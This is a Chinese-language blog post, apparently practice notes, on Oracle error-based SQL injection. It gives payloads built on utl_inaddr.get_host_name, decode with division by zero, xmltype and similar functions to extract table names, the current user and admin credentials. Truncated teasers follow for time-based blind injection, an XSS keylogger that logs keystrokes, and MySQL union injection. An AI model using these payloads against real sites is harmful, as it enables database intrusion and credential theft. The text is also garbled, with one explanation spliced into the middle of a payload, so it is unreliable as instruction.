0x01
使用報錯注入需要使用類似 1=[報錯語句],1>[報錯語句],使用比較運算子,這樣的方式進行報錯注入(mysql僅使用函式報錯即可),類似mssql報錯注入的方式。
news.jsp?id=1 and 1=1存在注入 隨便輸入 發現存在報錯資訊我們可以嘗試報錯注入正確news.jsp?id=1 and 1=2 錯誤
0x02報錯函式注入
utl_inaddr.get_host_name()進行報錯注入
and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1))utl_inaddr.get_host_address 本意是獲取ip 位址,但是如果傳遞引數無法得到解析就會返回乙個oracle 錯誤並顯示傳遞的引數。
我們傳遞的是乙個sql 語句所以返回的就是語句執行的結果。oracle 在啟動之後,把一些系統變數都放置到一些特定的檢視當中,可以利用這些檢視獲得想要的東西。通常非常重要的資訊有
0x002 ctxsys.drithsx.sn()進行報錯注入
0x03利用 dbms_xdb_version.checkin()
0x07decode進行報錯注入因為這種方式並不會通過報錯把查詢結果回顯回來,僅是用來作為頁面的表現不同的判斷方法。
and 1=(select decode(substr(user,1,1),'0x08xmltype在使用這個xmltype進行報錯時,很多人不知道為什麼要用chr(60),通過ascii查詢可以看到,60:』,查了下相關的api,發現xmltype在進行解析的時候必須以《開頭》結尾,這裡:冒號在這是必不可少的,至於為什麼是冒號這個我也沒查到,另外需要注意的是如果返回的資料種有空格的話,它會自動截斷,導致資料不完整,有replace函式替換成其他非空字元就可以s',(1/0),0) from dual) 匹配到正確的時候頁面返回錯誤
?id=1 and 1=(select decode(substr(user,1,1),'s',(1/0),0) from dual)
0x020x02 報錯函式注入資料
報錯admin表的 使用者和密碼
其他報錯函式差不多
by 感謝卿哥
大哥帶的Orchel資料庫時間盲注
0x01oracle基於延時的盲注總結 oracle注入中可以通過頁面響應的狀態,這裡指的是響應時間,通過這種方式判斷sql是否被執行的方式,便是時間盲注 oracle的時間盲注通常使用dbms pipe.receive message 而另外一種便是decode 與高耗時sql操作的組合,當然也可...
大哥帶的XSS練習
0x01反射型 可以看見什麼都沒有過濾 0x02儲存型xss 那麼可以看見也是成功了 那我們試試可不可以順著網線搞一下組員吶?算了 沒得伺服器 搞搞自己吧 document.onkeypress function evt key post key logfile keylog.txt fp fope...
大哥帶我們的mysql注入
這是今天的任務union select 查詢語句 第一步是先構造閉合 加入單引號報錯 然後 更據and 1 1 and1 2看是字元型還是布林型注入 www.薩達所大大所多t index.php?id 1 20order 20by 205 資料庫test查詢所有資料庫 要求是讀取web埠的admin...